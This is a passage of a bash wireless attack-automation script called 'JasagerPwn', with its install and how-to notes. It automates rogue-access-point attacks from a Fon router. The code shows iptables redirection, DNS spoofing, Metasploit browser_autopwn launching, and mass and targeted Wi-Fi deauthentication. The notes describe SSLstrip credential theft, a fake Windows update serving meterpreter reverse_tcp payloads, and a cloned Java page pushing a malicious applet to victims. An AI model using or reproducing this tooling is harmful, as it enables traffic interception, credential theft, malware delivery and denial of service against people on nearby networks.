"/etc/init.d/apache2 stop" & xterm -geometry 110x42+464-38 -bg black -fg green -T "[Metasploit Handler] v$version" -e "msfconsole -r /tmp/msfrcBP" & #xterm -geometry 110x42+464-38 -bg black -fg green -T "[leg3nd-BrowserPwn] v$version - WebServer" -e "msfcli auxiliary/server/browser_autopwn LHOST=$ourIP SRVPORT=80 SRVHOST=$ourIP URIPATH=/ E" & sleep 25 echo -e "\e[01;33m[!]\e[00m Forcing LAN to visit our site..." ipTableRedirect #iptables -t nat -A PREROUTING -p udp -j DNAT --to $ourIP #iptables --table nat --append PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $ourIP #iptables --table nat --append PREROUTING --in-interface $FONIFACE --jump REDIRECT #iptables --table nat --append PREROUTING --in-interface $FONIFACE xterm -geometry 75x7+0-36 -bg black -fg green -T "[JasagerPwn-DNS Spoof] v$version" -e "dnsspoof -i $FONIFACE -f /tmp/BP.dns" & echo -e "\e[01;33m[!]\e[00m Starting Web Server browserPwn attack @ $ourIP:80..." browserpwn="1" fi while true do if [ $fakeupdate -eq 1 ]; then break; fi if [ $javaATK -eq 1 ]; then break; fi echo echo -e "\e[01;33m[MODE][============-BrowserPwn Metasploit-==========][!]\e[00m" echo -e -n "\e[01;33m[!]\e[00m [S][1] to Stop Attack or [M][2] for Main Menu: " read -e USR_CHOICE2 #read -r -p "[?] Enter [I] to give Internet back or [M] for Main Menu: " USR_CHOICE2 case $USR_CHOICE2 in S|s|Stop|stop|1) xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE" & xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --jump REDIRECT" & xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $fonIP" & IPTABLES xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" & xterm -geometry 75x5+0+94 -bg black -fg green -T "[JasagerPwn-Apache Kill] v$version - Stopping Apache2" -e "/etc/init.d/apache2 stop" & browserpwn="0" sleep 3 #xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - FakeDNS" -e "dnsspoof -i $FONIFACE -f /tmp/Jasager.dns" & if [ $wasSniffing != "0" ]; then sslstrip fi echo -e "\e[01;33m[!]\e[00m Kill Metasploit Server Jobs if you use FakeUpdate!!" echo -e "\e[01;33m[!]\e[00m Dont Forget To Run 'ipconfig /flushdns' On Victim!!" break ;; M|m|Menu|menu|2) echo -e "\e[01;33m[!]\e[00m Please kill Browser AutoPwn jobs in metasploit, or close it." break ;; *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.." esac done ;; D|d|deauth|Deauth|DeAuth|5) attackCheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4` while true do echo echo -e "\e[01;33m[MODE][======================-DeAuth Attacks-=========================][!]\e[00m" echo -e "\e[01;33m[!]\e[00m [1][A]irodrop-ng [2][D]eAuth Mass [3][S]ingle DeAuth" echo -e "\e[01;33m[!]\e[00m [4][K]ill [5][M]ain menu" #read -r -p "[?] Please enter [ A | D | S | K | M ]: " USR_CHOICE3 echo -e -n "\e[01;33m[!]\e[00m Choose From Above: " read -e USR_CHOICE3 case $USR_CHOICE3 in A|a|airodrop|Airodrop|1) if [ -e "/usr/bin/airdrop-ng" ]; then if [ -e "/tmp/cap-01.csv" ]; then rm /tmp/cap-* ; fi sleep 2 xterm -geometry 90x30+464+0 -bg black -fg green -T "[JasagerPwn-Airodump] Capturing APs" -e "airodump-ng -w /tmp/cap -o csv $MIFACE" & AIRDUMPID=`echo $!` sleep 10 xterm -geometry 75x12+464+418 -bg black -fg green -hold -T "[JasagerPwn-Airdrop Attack] v$version" -e "airdrop-ng -b -i $MIFACE -r /tmp/deauth.conf -t /tmp/cap-01.csv" & AIRDROPID=`echo $!` else echo echo -e "\e[01;31m[!]\e[00m Error: You need to fully install airdrop-ng for this." echo -e "\e[01;31m[!]\e[00m Please go to /pentest/wireless/airdrop-ng and run install.py." fi ;; D|d|deauth|DeAuth|2) #if [ ! $ATKcheck ]; then # xterm -geometry 75x12+464+288 -bg black -fg green -T "JasagerPwn v$version - Start $MIFACE" -e "airmon-ng start $WIFACE" & # sleep 4 #fi xterm -geometry 75x12+464+265 -bg black -fg green -T "[JasagerPwn-MassDeauth.sh] v$version" -e "chmod +x src/deauth.sh && bash src/deauth.sh" & DEAUTHPID=`echo $!` ;; S|s|single|Single|3) #if [ ! $ATKcheck ]; then # xterm -geometry 75x12+464+288 -bg black -fg green -T "JasagerPwn v$version - Start $MIFACE" -e "#airmon-ng start $WIFACE" & # sleep 4 #fi xterm -geometry 75x12+464+288 -bg black -fg green -T "[JasagerPwn-DeAuth Kill] v$version" -e "killall -9 aireplay" & xterm -geometry 95x47+577+0 -hold -bg black -fg green -T "[CLOSE MANUALLY] - Airodump Capture" -e "airodump-ng $MIFACE" & airID=`echo $!` echo read -r -p "[?] Enter the target APs BSSID: " TBSSID kill $airID read -r -p "[?] Do You want a specific client? [ Y | N ]: " DMODE case $DMODE in y|Y|Yes|yes|1) xterm -geometry 95x47+577+0 -hold -bg black -fg green -T "[CLOSE MANUALLY] - Airodump Capture" -e "airodump-ng --bssid $TBSSID $MIFACE" & echo read -r -p "[?] Enter the target Client MAC: " CMAC xterm -geometry 75x12+464+265 -bg black -fg green -T "[JasagerPwn-Manual DeAuth] v$version" -e "aireplay-ng -D -0 20 -a $TBSSID -c $CMAC $MIFACE" & ;; n|N|No|no|2) xterm -geometry 75x12+464+265 -bg black -fg green -T "[JasagerPwn-Manual DeAuth] v$version" -e "aireplay-ng -0 20 -D -a $TBSSID $MIFACE" & ;; *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.." esac #take in information from dump for aireplay ;; K|k|kill|Kill|4) xterm -geometry 75x12+464+288 -bg black -fg green -T "[JasagerPwn-DeAuth Kill] v$version" -e "kill $DEAUTHPID && killall -9 aireplay-ng && killall airodump-ng && kill $AIRDROPID && kill $AIRDUMPID" & xterm -geometry 75x12+464+288 -bg black -fg green -T "[JasagerPwn-DeAuth Kill] v$version" -e "kill $AIRDROPID && kill $AIRDUMPID && kill $airID" & ;; M|m|menu|Menu|5) break ;; *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.." esac done ;; N|n|Network|network|net|6) while true do echo echo -e "\e[01;33m[MODE][==================-Network Settings-====================][!]\e[00m" echo -e "\e[01;33m[!]\e[00m [1][I]nterface [2][D]eAuth Config" echo -e "\e[01;33m[!]\e[00m [3][R]efresh I-net [4][M]ain menu" echo -e -n "\e[01;33m[!]\e[00m Choose From Above: " read -e USR_CHOICE99 case $USR_CHOICE99 in I|i|interface|Interface|1) read -r -p "[?] Using a WiFi Network (Adds DeAuth Rule) [ Y | N ]: " USR_CHOICE98 case $USR_CHOICE98 in #Connecting to WIFI y|Y|Yes|yes|1) xterm -geometry 75x12+464+288 -bg black -fg green -T "[ResolvLoop Kill] v$version" -e "killall -9 /tmp/resolv.sh" #kill $dnsID2 >/dev/null 2>&1 echo read -p "[!] Connect to WiFi Network THEN Press [Enter] .." echo echo -e "\e[01;33m[!]\e[00m Current Gateway Interface = $IFACE" read -r -p "[?] Please Enter the New Gateway Interface: " NEWIFACE IFACE=`echo $NEWIFACE` if [ $sniffing -eq 0 ] && [ $browserpwn -eq 0 ] && [ $fakeupdate -eq 0 ] && [ $javaATK -eq 0 ]; then IPTABLES elif [ $sniffing -eq 1 ]; then ipTableRedirect elif [ $browserpwn -eq 1 ]; then ipTableRedirect elif [ $fakeupdate -eq 1 ]; then ipTableRedirect elif [ $javaATK -eq 1 ]; then ipTableRedirect fi while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done >/dev/null 2>&1 & sleep 2 && dnsID2=`echo $!` wifiMAC=`ifconfig $IFACE | grep "HWaddr" | awk '{print $5}' | tr "[a-z]" "[A-Z]"` newIFACEmac=`iwconfig $IFACE | grep "Access Point" | awk '{print $6}'` echo "a/$newIFACEmac|$wifiMAC" >> /tmp/deauth.conf ;; #Connecting to HARDWIRE n|N|No|no|2) #kill $dnsID2 >/dev/null 2>&1 xterm -geometry 75x12+464+288 -bg black -fg green -T "[ResolvLoop Kill] v$version" -e "killall -9 /tmp/resolv.sh" echo echo -e "\e[01;33m[!]\e[00m Current Gateway Interface = $IFACE" read -r -p "[?] Please Enter the New Gateway Interface: " NEWIFACE IFACE=`echo $NEWIFACE` if [ $sniffing -eq 0 ] && [ $browserpwn -eq 0 ] && [ $fakeupdate -eq 0 ] && [ $javaATK -eq 0 ]; then IPTABLES elif [ $sniffing -eq 1 ]; then ipTableRedirect elif [ $browserpwn -eq 1 ]; then ipTableRedirect elif [ $fakeupdate -eq 1 ]; then ipTableRedirect elif [ $javaATK -eq 1 ]; then ipTableRedirect fi #while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done >/dev/null 2>&1 & echo "while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done &" > /tmp/resolv.sh chmod +x /tmp/resolv.sh xterm -geometry 0x0+0+0 -e "bash /tmp/resolv.sh" & sleep 2 && dnsID2=`echo $!` ;; *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.." esac ;; D|d|deauth|DeAuth|2) xterm -geometry 95x47+577+0 -bg black -fg green -T "[EDITING] Airdrop DeAuth Config" -e "nano /tmp/deauth.conf" echo echo -e "\e[01;33m[!]\e[00m Go To DeAuth Menu, Kill it, and Restart Airdrop-ng to apply changes." ;; R|r|refresh|Refresh|3) xterm -geometry 75x12+464+288 -bg black -fg green -T "[JasagerPwn-DeAuth Kill] v$version" -e "ifconfig $IFACE up && dhclient $IFACE" sleep 3 gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` xterm -geometry 75x12+464+288 -bg black -fg green -T "[ResolvLoop Kill] v$version" -e "killall -9 /tmp/resolv.sh" & #while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done &> /dev/null & echo "while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done &" > /tmp/resolv.sh chmod +x /tmp/resolv.sh xterm -geometry 0x0+0+0 -e "bash /tmp/resolv.sh" & sleep 2 && dnsID2=`echo $!` ;; M|m|menu|Menu|4) break ;; *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.." esac done ;; X|x|exit|Exit|7) cleanup ;; *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.." esac done cleanup ####################################################################################### INSTALL_HOWTO: ================================ JasagerPwn Attack Vector Script -------------------------------- leg3nd @ info-s3curity.com -------------------------------- Bugs @ hak5 forums or via email dgriffin831@gmail.com -------------------------------- ================================ General Description: This is a fairly basic bash script used to automate multiple attack vectors using Jasager/Karma on a Fon router. The script is designed to be error coded and seamless in terms of switching access and attacks at will. I have found it to be extremely useful in pentest scenarios becuase of all the time saved doing basic setup for attacks manually. Enjoy at your own risk! -This script is going to assume your using backtrack 4 with /pentest/, if you have it somewhere else just adjust it accordingly. The following dependencies are required for full functionality of the script... Dependencies: PHP5, Apache2, Metasploit, Social Engineering Toolkit, Macchanger, Dsniff Suite, DHCP3, INSTALLED SSLstrip, INSTALLED airdrop-ng, Aircrack-ng suite w/ working Injection. Step 1: Insure you have everything needed. ------------------------------------------ apt-get install php5 dhcp3-server macchanger dsniff aircrack-ng apache2 twisted-web libapache2-mod-php5 cd /pentest/exploits/SET/ && python install.py cd /pentest/wireless/airdrop-ng/ && python install.py - Make sure SSLstrip is installed with the same method, I think it is by default in bt4. If it isnt working this is how to install it: cd /pentest/ wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz tar xvf sslstrip-0.7.tar.gz cd sslstrip-0.7/ chmod +x setup.py python setup.py Step 2: Adjust the script variables. ------------------------------------ - Open up the script in your favorite editor and look over all the variables and their comments. - If your not using bt4 you may need to adjust the SET and MSF diretories. - Set up the correct interfaces according to your setup. - Set the 'fonIP' variable to an available IP on the FONs subnet. - I recommend setting up the 'metScript' function to automaticlly do what you need on your victims, by default this set to "0" and uses reverse_tcp_dns backdoors. Step 3: Setup FON ------------------ - We need to remove DHCP on the fon becuase we will be running it from the computer instead. - If your using some other DHCP service you may also need to disable that. /etc/init.d/dnsmasq stop /etc/init.d/dnsmasq disable Thats it! If everything is done correctly and assuming the system has the correct versions of python and ruby, you should be good to go. ======================= Included Attacks ======================= SSLstrip/Sniffing: By default it will always be using dsniff, driftnet, and urlsnarf becuase its seemless to the users anyways. The attack SSLstrip/sniffing will start stealing SSL certs from https:// websites as they browse, it works on around 95% of SSL websites, These logs will be followed, saved, and parsed for login credentials. SSLstrip is set to use port 10000 and will be paused when using other attacks. FakeUpdate(by g0tmi1k): Redirect WLAN to fake microsoft update page hosted in apache with a generated payload with meterpreter reverse_tcp. This currently only has download support for MS clients. BrowserPwn: This will redirect WLAN to a metasploit browser_autopwn server, This is fairly nosiy and will throw out any exploit thats availble for that browser to gain a reverse_tcp meterpreter session. This works on any OS. JavaPwn: This will redirect WLAN to a SET generated java page with a reverse_tcp meterpreter java applet, It asks to 'run' the Applet while on a cloned/modified version of the Java download page. Cloned pages include google and a fake Sun Java page. Keep in mind that cloned pages need to have images,scripts, and css hosted LOCALLY to work. -This attack vector is included with 2 templates in the script (google and a java required page). -KEEP IN MIND - When combining the "clone website" feature of SET with these IPtables command, the template will be obscured becuase images cannot be pulled from the remote server. I manually edited the sites to work. DeAuth: There are a few different de-authorization attacks included in the script. -The most effective being airdrop-ng, this is a client and rule based mass deauth tool, It is set to deauth every AP around you expect your AP and your wireless card (so you can tunnel via wireless). -I normally keep a terminal open in /tmp (where i create the config files in the start of the script), and you may manually edit the deauth configurations as needed. It will not reset until the whole script restarts. -"Mass DeAuth" is a rather simple bash script which uses iwscan to gather APs informations and sends out deauth packets via 'aireplay-ng -0', but this is sent to the AP (broadcast) itself, and not client based. -Single DeAuth is just a normal deauth attack, This is if you wanted to be a little stealthy and pick up specific clients.